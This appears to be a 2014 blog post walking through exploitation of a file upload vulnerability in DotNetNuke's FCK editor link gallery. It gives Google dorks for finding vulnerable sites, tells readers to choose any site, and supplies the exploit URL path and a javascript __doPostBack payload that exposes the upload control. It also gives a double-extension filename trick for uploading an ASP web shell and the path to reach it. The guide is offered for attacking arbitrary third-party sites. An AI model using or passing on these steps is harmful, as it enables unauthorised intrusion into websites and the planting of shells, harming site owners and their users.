Thursday, 27 February 2014

Dot Net Nuke [DNN] : File Upload Vulnerability









Finding Vulnerable Target

Dork:  inurl:/tabid/36/language/en-US/Default.aspx
             inurl:fcklinkgallery.aspx

Exploit : /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

1- Copy any of those dork and paste in Google

2-Choose any site

3- Paste the exploit at the end of the site URL

Example:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

If you see something like this, that's Good :D
 

Exploiting Target

1- Copy the codes below and paste in your address bar / browser console.

   javascript:__doPostBack('ctlURL$cmdUpload','')  

2- After you enter the javascript, you will see the browse option like in the picture below.





3- To upload shell, you only can upload ASP filetype shell.

Example: Umer.asp;.jpg 

DOWNLOAD

4- To view your file, add /portals/0/FILENAME.jpg at the end of the site

Example: www.site.com/portals/0/FILENAME.jpg

 

inurl:/tabid/36/language/en-US/Default.aspx
inurl:/tabid/36/language/en-US/Default.aspx